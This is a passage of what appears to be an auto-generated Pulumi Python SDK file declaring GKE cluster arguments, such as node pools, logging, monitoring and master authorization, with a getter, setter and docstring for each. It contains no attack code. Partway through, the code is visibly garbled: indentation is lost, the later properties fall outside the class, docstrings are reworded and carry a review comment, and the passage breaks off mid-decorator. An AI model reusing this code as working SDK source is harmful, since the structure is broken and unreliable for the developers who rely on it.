:param pulumi.Input[bool] enable_binary_authorization: Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
:param pulumi.Input[bool] enable_intranode_visibility: Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
:param pulumi.Input[bool] enable_kubernetes_alpha: Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
:param pulumi.Input[bool] enable_l4_ilb_subsetting: Whether L4ILB Subsetting is enabled for this cluster.
:param pulumi.Input[bool] enable_legacy_abac: Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
:param pulumi.Input[bool] enable_shielded_nodes: Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
:param pulumi.Input[bool] enable_tpu: Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
:param pulumi.Input['ClusterIdentityServiceConfigArgs'] identity_service_config: . Structure is documented below.
:param pulumi.Input[int] initial_node_count: The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
:param pulumi.Input['ClusterIpAllocationPolicyArgs'] ip_allocation_policy: Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
:param pulumi.Input[str] location: The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
:param pulumi.Input['ClusterLoggingConfigArgs'] logging_config: Logging configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] logging_service: The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
:param pulumi.Input['ClusterMaintenancePolicyArgs'] maintenance_policy: The maintenance policy to use for the cluster. Structure is
documented below.
:param pulumi.Input['ClusterMasterAuthArgs'] master_auth: The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
:param pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs'] master_authorized_networks_config: The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
:param pulumi.Input[str] min_master_version: The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
:param pulumi.Input['ClusterMonitoringConfigArgs'] monitoring_config: Monitoring configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] monitoring_service: The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
:param pulumi.Input[str] name: The name of the cluster, unique within the project and
location.
:param pulumi.Input[str] network: The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
:param pulumi.Input['ClusterNetworkPolicyArgs'] network_policy: Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
:param pulumi.Input[str] networking_mode: Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
:param pulumi.Input['ClusterNodeConfigArgs'] node_config: Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] node_locations: The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
:param pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]] node_pools: List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
:param pulumi.Input[str] node_version: The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
:param pulumi.Input['ClusterNotificationConfigArgs'] notification_config: Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
:param pulumi.Input['ClusterPodSecurityPolicyConfigArgs'] pod_security_policy_config: ) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
:param pulumi.Input['ClusterPrivateClusterConfigArgs'] private_cluster_config: Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
:param pulumi.Input[str] private_ipv6_google_access: The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
:param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
:param pulumi.Input['ClusterReleaseChannelArgs'] release_channel: Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
:param pulumi.Input[bool] remove_default_node_pool: If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_labels: The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
:param pulumi.Input['ClusterResourceUsageExportConfigArgs'] resource_usage_export_config: Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
:param pulumi.Input[str] subnetwork: The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
:param pulumi.Input['ClusterVerticalPodAutoscalingArgs'] vertical_pod_autoscaling: Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
:param pulumi.Input['ClusterWorkloadIdentityConfigArgs'] workload_identity_config: Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
if addons_config is not None:
pulumi.set(__self__, "addons_config", addons_config)
if authenticator_groups_config is not None:
pulumi.set(__self__, "authenticator_groups_config", authenticator_groups_config)
if cluster_autoscaling is not None:
pulumi.set(__self__, "cluster_autoscaling", cluster_autoscaling)
if cluster_ipv4_cidr is not None:
pulumi.set(__self__, "cluster_ipv4_cidr", cluster_ipv4_cidr)
if cluster_telemetry is not None:
pulumi.set(__self__, "cluster_telemetry", cluster_telemetry)
if confidential_nodes is not None:
pulumi.set(__self__, "confidential_nodes", confidential_nodes)
if database_encryption is not None:
pulumi.set(__self__, "database_encryption", database_encryption)
if datapath_provider is not None:
pulumi.set(__self__, "datapath_provider", datapath_provider)
if default_max_pods_per_node is not None:
pulumi.set(__self__, "default_max_pods_per_node", default_max_pods_per_node)
if default_snat_status is not None:
pulumi.set(__self__, "default_snat_status", default_snat_status)
if description is not None:
pulumi.set(__self__, "description", description)
if dns_config is not None:
pulumi.set(__self__, "dns_config", dns_config)
if enable_autopilot is not None:
pulumi.set(__self__, "enable_autopilot", enable_autopilot)
if enable_binary_authorization is not None:
pulumi.set(__self__, "enable_binary_authorization", enable_binary_authorization)
if enable_intranode_visibility is not None:
pulumi.set(__self__, "enable_intranode_visibility", enable_intranode_visibility)
if enable_kubernetes_alpha is not None:
pulumi.set(__self__, "enable_kubernetes_alpha", enable_kubernetes_alpha)
if enable_l4_ilb_subsetting is not None:
pulumi.set(__self__, "enable_l4_ilb_subsetting", enable_l4_ilb_subsetting)
if enable_legacy_abac is not None:
pulumi.set(__self__, "enable_legacy_abac", enable_legacy_abac)
if enable_shielded_nodes is not None:
pulumi.set(__self__, "enable_shielded_nodes", enable_shielded_nodes)
if enable_tpu is not None:
pulumi.set(__self__, "enable_tpu", enable_tpu)
if identity_service_config is not None:
pulumi.set(__self__, "identity_service_config", identity_service_config)
if initial_node_count is not None:
pulumi.set(__self__, "initial_node_count", initial_node_count)
if ip_allocation_policy is not None:
pulumi.set(__self__, "ip_allocation_policy", ip_allocation_policy)
if location is not None:
pulumi.set(__self__, "location", location)
if logging_config is not None:
pulumi.set(__self__, "logging_config", logging_config)
if logging_service is not None:
pulumi.set(__self__, "logging_service", logging_service)
if maintenance_policy is not None:
pulumi.set(__self__, "maintenance_policy", maintenance_policy)
if master_auth is not None:
pulumi.set(__self__, "master_auth", master_auth)
if master_authorized_networks_config is not None:
pulumi.set(__self__, "master_authorized_networks_config", master_authorized_networks_config)
if min_master_version is not None:
pulumi.set(__self__, "min_master_version", min_master_version)
if monitoring_config is not None:
pulumi.set(__self__, "monitoring_config", monitoring_config)
if monitoring_service is not None:
pulumi.set(__self__, "monitoring_service", monitoring_service)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if network_policy is not None:
pulumi.set(__self__, "network_policy", network_policy)
if networking_mode is not None:
pulumi.set(__self__, "networking_mode", networking_mode)
if node_config is not None:
pulumi.set(__self__, "node_config", node_config)
if node_locations is not None:
pulumi.set(__self__, "node_locations", node_locations)
if node_pools is not None:
pulumi.set(__self__, "node_pools", node_pools)
if node_version is not None:
pulumi.set(__self__, "node_version", node_version)
if notification_config is not None:
pulumi.set(__self__, "notification_config", notification_config)
if pod_security_policy_config is not None:
pulumi.set(__self__, "pod_security_policy_config", pod_security_policy_config)
if private_cluster_config is not None:
pulumi.set(__self__, "private_cluster_config", private_cluster_config)
if private_ipv6_google_access is not None:
pulumi.set(__self__, "private_ipv6_google_access", private_ipv6_google_access)
if project is not None:
pulumi.set(__self__, "project", project)
if release_channel is not None:
pulumi.set(__self__, "release_channel", release_channel)
if remove_default_node_pool is not None:
pulumi.set(__self__, "remove_default_node_pool", remove_default_node_pool)
if resource_labels is not None:
pulumi.set(__self__, "resource_labels", resource_labels)
if resource_usage_export_config is not None:
pulumi.set(__self__, "resource_usage_export_config", resource_usage_export_config)
if subnetwork is not None:
pulumi.set(__self__, "subnetwork", subnetwork)
if vertical_pod_autoscaling is not None:
pulumi.set(__self__, "vertical_pod_autoscaling", vertical_pod_autoscaling)
if workload_identity_config is not None:
pulumi.set(__self__, "workload_identity_config", workload_identity_config)
    @property
    @pulumi.getter(name="addonsConfig")
    def addons_config(self) -> Optional[pulumi.Input['ClusterAddonsConfigArgs']]:
        """
        The configuration for addons supported by GKE.
        Structure is documented below.
        """
        return pulumi.get(self, "addons_config")

    @addons_config.setter
    def addons_config(self, value: Optional[pulumi.Input['ClusterAddonsConfigArgs']]) -> None:
        """Setter for ``addons_config``."""
        pulumi.set(self, "addons_config", value)
    @property
    @pulumi.getter(name="authenticatorGroupsConfig")
    def authenticator_groups_config(self) -> Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]:
        """
        Configuration for the
        [Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
        Structure is documented below.
        """
        return pulumi.get(self, "authenticator_groups_config")

    @authenticator_groups_config.setter
    def authenticator_groups_config(self, value: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]) -> None:
        """Setter for ``authenticator_groups_config``."""
        pulumi.set(self, "authenticator_groups_config", value)
    @property
    @pulumi.getter(name="clusterAutoscaling")
    def cluster_autoscaling(self) -> Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]:
        """
        Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
        automatically adjust the size of the cluster and create/delete node pools based
        on the current needs of the cluster's workload. See the
        [guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
        for more details. Structure is documented below.
        """
        return pulumi.get(self, "cluster_autoscaling")

    @cluster_autoscaling.setter
    def cluster_autoscaling(self, value: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]) -> None:
        """Setter for ``cluster_autoscaling``."""
        pulumi.set(self, "cluster_autoscaling", value)
    @property
    @pulumi.getter(name="clusterIpv4Cidr")
    def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:
        """
        The IP address range of the Kubernetes pods
        in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
        automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
        only work for routes-based clusters, where `ip_allocation_policy` is not defined.
        """
        return pulumi.get(self, "cluster_ipv4_cidr")

    @cluster_ipv4_cidr.setter
    def cluster_ipv4_cidr(self, value: Optional[pulumi.Input[str]]) -> None:
        """Setter for ``cluster_ipv4_cidr``."""
        pulumi.set(self, "cluster_ipv4_cidr", value)
    @property
    @pulumi.getter(name="clusterTelemetry")
    def cluster_telemetry(self) -> Optional[pulumi.Input['ClusterClusterTelemetryArgs']]:
        """
        Configuration for
        [ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
        Structure is documented below.
        """
        return pulumi.get(self, "cluster_telemetry")

    @cluster_telemetry.setter
    def cluster_telemetry(self, value: Optional[pulumi.Input['ClusterClusterTelemetryArgs']]) -> None:
        """Setter for ``cluster_telemetry``."""
        pulumi.set(self, "cluster_telemetry", value)
    @property
    @pulumi.getter(name="confidentialNodes")
    def confidential_nodes(self) -> Optional[pulumi.Input['ClusterConfidentialNodesArgs']]:
        """
        Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
        """
        return pulumi.get(self, "confidential_nodes")

    @confidential_nodes.setter
    def confidential_nodes(self, value: Optional[pulumi.Input['ClusterConfidentialNodesArgs']]) -> None:
        """Setter for ``confidential_nodes``."""
        pulumi.set(self, "confidential_nodes", value)
    @property
    @pulumi.getter(name="databaseEncryption")
    def database_encryption(self) -> Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]:
        """
        Structure is documented below.
        """
        return pulumi.get(self, "database_encryption")

    @database_encryption.setter
    def database_encryption(self, value: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]) -> None:
        """Setter for ``database_encryption``."""
        pulumi.set(self, "database_encryption", value)
    @property
    @pulumi.getter(name="datapathProvider")
    def datapath_provider(self) -> Optional[pulumi.Input[str]]:
        """
        The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
        """
        return pulumi.get(self, "datapath_provider")

    @datapath_provider.setter
    def datapath_provider(self, value: Optional[pulumi.Input[str]]) -> None:
        """Setter for ``datapath_provider``."""
        pulumi.set(self, "datapath_provider", value)
    @property
    @pulumi.getter(name="defaultMaxPodsPerNode")
    def default_max_pods_per_node(self) -> Optional[pulumi.Input[int]]:
        """
        The default maximum number of pods
        per node in this cluster. This doesn't work on "routes-based" clusters, clusters
        that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
        for more information.
        """
        return pulumi.get(self, "default_max_pods_per_node")

    @default_max_pods_per_node.setter
    def default_max_pods_per_node(self, value: Optional[pulumi.Input[int]]) -> None:
        """Setter for ``default_max_pods_per_node``."""
        pulumi.set(self, "default_max_pods_per_node", value)
    @property
    @pulumi.getter(name="defaultSnatStatus")
    def default_snat_status(self) -> Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]:
        """
        [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
        """
        return pulumi.get(self, "default_snat_status")

    @default_snat_status.setter
    def default_snat_status(self, value: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]) -> None:
        """Setter for ``default_snat_status``."""
        pulumi.set(self, "default_snat_status", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Description of the cluster.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]) -> None:
        """Setter for ``description``."""
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="dnsConfig")
    def dns_config(self) -> Optional[pulumi.Input['ClusterDnsConfigArgs']]:
        """
        Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
        """
        return pulumi.get(self, "dns_config")

    @dns_config.setter
    def dns_config(self, value: Optional[pulumi.Input['ClusterDnsConfigArgs']]) -> None:
        """Setter for ``dns_config``."""
        pulumi.set(self, "dns_config", value)
    @property
    @pulumi.getter(name="enableAutopilot")
    def enable_autopilot(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable Autopilot for this cluster. Defaults to `false`.
        Note that when this option is enabled, certain features of Standard GKE are not available.
        See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
        for available features.
        """
        return pulumi.get(self, "enable_autopilot")

    @enable_autopilot.setter
    def enable_autopilot(self, value: Optional[pulumi.Input[bool]]) -> None:
        """Setter for ``enable_autopilot``."""
        pulumi.set(self, "enable_autopilot", value)
    @property
    @pulumi.getter(name="enableBinaryAuthorization")
    def enable_binary_authorization(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable Binary Authorization for this cluster.
        If enabled, all container images will be validated by Google Binary Authorization.
        """
        return pulumi.get(self, "enable_binary_authorization")

    @enable_binary_authorization.setter
    def enable_binary_authorization(self, value: Optional[pulumi.Input[bool]]) -> None:
        """Setter for ``enable_binary_authorization``."""
        pulumi.set(self, "enable_binary_authorization", value)
    @property
    @pulumi.getter(name="enableIntranodeVisibility")
    def enable_intranode_visibility(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
        """
        return pulumi.get(self, "enable_intranode_visibility")

    @enable_intranode_visibility.setter
    def enable_intranode_visibility(self, value: Optional[pulumi.Input[bool]]) -> None:
        """Setter for ``enable_intranode_visibility``."""
        pulumi.set(self, "enable_intranode_visibility", value)
    @property
    @pulumi.getter(name="enableKubernetesAlpha")
    def enable_kubernetes_alpha(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to enable Kubernetes Alpha features for
        this cluster. Note that when this option is enabled, the cluster cannot be upgraded
        and will be automatically deleted after 30 days.
        """
        return pulumi.get(self, "enable_kubernetes_alpha")

    @enable_kubernetes_alpha.setter
    def enable_kubernetes_alpha(self, value: Optional[pulumi.Input[bool]]) -> None:
        """Setter for ``enable_kubernetes_alpha``."""
        pulumi.set(self, "enable_kubernetes_alpha", value)
    @property
    @pulumi.getter(name="enableL4IlbSubsetting")
    def enable_l4_ilb_subsetting(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether L4ILB Subsetting is enabled for this cluster.
        """
        return pulumi.get(self, "enable_l4_ilb_subsetting")

    @enable_l4_ilb_subsetting.setter
    def enable_l4_ilb_subsetting(self, value: Optional[pulumi.Input[bool]]) -> None:
        """Setter for ``enable_l4_ilb_subsetting``."""
        pulumi.set(self, "enable_l4_ilb_subsetting", value)
@property
@pulumi.getter(name="enableLegacyAbac")
def enable_legacy_abac(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether the legacy ABAC authorizer is enabled for this cluster.
    When on, identities in the system — including service accounts, nodes,
    and controllers — receive statically granted permissions beyond those
    provided by the RBAC configuration or IAM. Defaults to `false`
    """
    return pulumi.get(self, "enable_legacy_abac")

@enable_legacy_abac.setter
def enable_legacy_abac(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "enable_legacy_abac", value)
@property
@pulumi.getter(name="enableShieldedNodes")
def enable_shielded_nodes(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether the Shielded Nodes feature is enabled on all nodes in this
    cluster. Defaults to `true`.
    """
    return pulumi.get(self, "enable_shielded_nodes")

@enable_shielded_nodes.setter
def enable_shielded_nodes(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "enable_shielded_nodes", value)
@property
@pulumi.getter(name="enableTpu")
def enable_tpu(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether Cloud TPU resources may be used in this cluster. See the
    [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
    """
    return pulumi.get(self, "enable_tpu")

@enable_tpu.setter
def enable_tpu(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "enable_tpu", value)
@property
@pulumi.getter(name="identityServiceConfig")
def identity_service_config(self) -> Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]:
    """
    Configuration for the cluster's `identityServiceConfig` block.
    Structure is documented below.
    """
    # NOTE(review): the generated docstring was the bare fragment
    # ". Structure is documented below." — completed here from the field name.
    return pulumi.get(self, "identity_service_config")

@identity_service_config.setter
def identity_service_config(self, value: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]):
    pulumi.set(self, "identity_service_config", value)
@property
@pulumi.getter(name="initialNodeCount")
def initial_node_count(self) -> Optional[pulumi.Input[int]]:
    """
    Number of nodes to create in this cluster's default node pool
    (per zone for regional or multi-zonal clusters). Must be set if
    `node_pool` is not set. If you're using `container.NodePool` objects
    with no default node pool, you'll need to set this to a value of at
    least `1`, alongside setting `remove_default_node_pool` to `true`.
    """
    return pulumi.get(self, "initial_node_count")

@initial_node_count.setter
def initial_node_count(self, value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "initial_node_count", value)
@property
@pulumi.getter(name="ipAllocationPolicy")
def ip_allocation_policy(self) -> Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]:
    """
    Cluster IP allocation configuration for VPC-native clusters.
    Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
    making the cluster VPC-native instead of routes-based.
    Structure is documented below.
    """
    return pulumi.get(self, "ip_allocation_policy")

@ip_allocation_policy.setter
def ip_allocation_policy(self, value: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]):
    pulumi.set(self, "ip_allocation_policy", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
    """
    Region or zone in which the cluster master is created, which is also
    the default node location. Specifying a zone (such as `us-central1-a`)
    produces a zonal cluster with a single cluster master; specifying a
    region (such as `us-west1`) produces a regional cluster with multiple
    masters spread across zones in the region, and with default node
    locations in those zones as well
    """
    return pulumi.get(self, "location")

@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "location", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['ClusterLoggingConfigArgs']]:
    """
    The cluster's logging configuration. Structure is documented below.
    """
    return pulumi.get(self, "logging_config")

@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['ClusterLoggingConfigArgs']]):
    pulumi.set(self, "logging_config", value)
@property
@pulumi.getter(name="loggingService")
def logging_service(self) -> Optional[pulumi.Input[str]]:
    """
    Logging service the cluster writes logs to. Available options are
    `logging.googleapis.com`(Legacy Stackdriver),
    `logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
    """
    return pulumi.get(self, "logging_service")

@logging_service.setter
def logging_service(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "logging_service", value)
@property
@pulumi.getter(name="maintenancePolicy")
def maintenance_policy(self) -> Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]:
    """
    Maintenance policy applied to the cluster. Structure is documented below.
    """
    return pulumi.get(self, "maintenance_policy")

@maintenance_policy.setter
def maintenance_policy(self, value: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]):
    pulumi.set(self, "maintenance_policy", value)
@property
@pulumi.getter(name="masterAuth")
def master_auth(self) -> Optional[pulumi.Input['ClusterMasterAuthArgs']]:
    """
    Authentication information for reaching the Kubernetes master.
    The API only returns some values in this block when your service
    account has permission to get credentials for your GKE cluster; if
    you see an unexpected diff unsetting your client cert, ensure you
    have the `container.clusters.getCredentials` permission.
    Structure is documented below.
    """
    return pulumi.get(self, "master_auth")

@master_auth.setter
def master_auth(self, value: Optional[pulumi.Input['ClusterMasterAuthArgs']]):
    pulumi.set(self, "master_auth", value)
@property
@pulumi.getter(name="masterAuthorizedNetworksConfig")
def master_authorized_networks_config(self) -> Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]:
    """
    Desired configuration options for master authorized networks.
    Omitting the nested `cidr_blocks` attribute disallows external
    access (except the cluster node IPs, which GKE automatically
    whitelists). Structure is documented below.
    """
    return pulumi.get(self, "master_authorized_networks_config")

@master_authorized_networks_config.setter
def master_authorized_networks_config(self, value: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]):
    pulumi.set(self, "master_authorized_networks_config", value)
@property
@pulumi.getter(name="minMasterVersion")
def min_master_version(self) -> Optional[pulumi.Input[str]]:
    """
    Minimum version of the master. Because GKE auto-updates the master
    to new versions, this does not guarantee the current master
    version--use the read-only `master_version` field to obtain that.
    When unset, GKE picks the version of the most recent official
    release (which is not necessarily the latest version). Most users
    will find the `container.get_engine_versions` data source useful -
    it indicates which versions are available. If you intend to specify
    versions manually,
    [the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
    describe the various acceptable formats for this field.
    """
    return pulumi.get(self, "min_master_version")

@min_master_version.setter
def min_master_version(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "min_master_version", value)
@property
@pulumi.getter(name="monitoringConfig")
def monitoring_config(self) -> Optional[pulumi.Input['ClusterMonitoringConfigArgs']]:
    """
    The cluster's monitoring configuration. Structure is documented below.
    """
    return pulumi.get(self, "monitoring_config")

@monitoring_config.setter
def monitoring_config(self, value: Optional[pulumi.Input['ClusterMonitoringConfigArgs']]):
    pulumi.set(self, "monitoring_config", value)
@property
@pulumi.getter(name="monitoringService")
def monitoring_service(self) -> Optional[pulumi.Input[str]]:
    """
    Monitoring service the cluster writes metrics to.
    Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
    VM metrics will be collected by Google Compute Engine regardless of this setting
    Available options include
    `monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
    Defaults to `monitoring.googleapis.com/kubernetes`
    """
    return pulumi.get(self, "monitoring_service")

@monitoring_service.setter
def monitoring_service(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "monitoring_service", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
    """
    Name of the cluster; must be unique within the project and location.
    """
    return pulumi.get(self, "name")

@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
    """
    Name or self_link of the Google Compute Engine network the cluster
    is connected to. For Shared VPC, set this to the self link of the
    shared network.
    """
    return pulumi.get(self, "network")

@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkPolicy")
def network_policy(self) -> Optional[pulumi.Input['ClusterNetworkPolicyArgs']]:
    """
    Options for the
    [NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
    feature. Structure is documented below.
    """
    return pulumi.get(self, "network_policy")

@network_policy.setter
def network_policy(self, value: Optional[pulumi.Input['ClusterNetworkPolicyArgs']]):
    pulumi.set(self, "network_policy", value)
@property
@pulumi.getter(name="networkingMode")
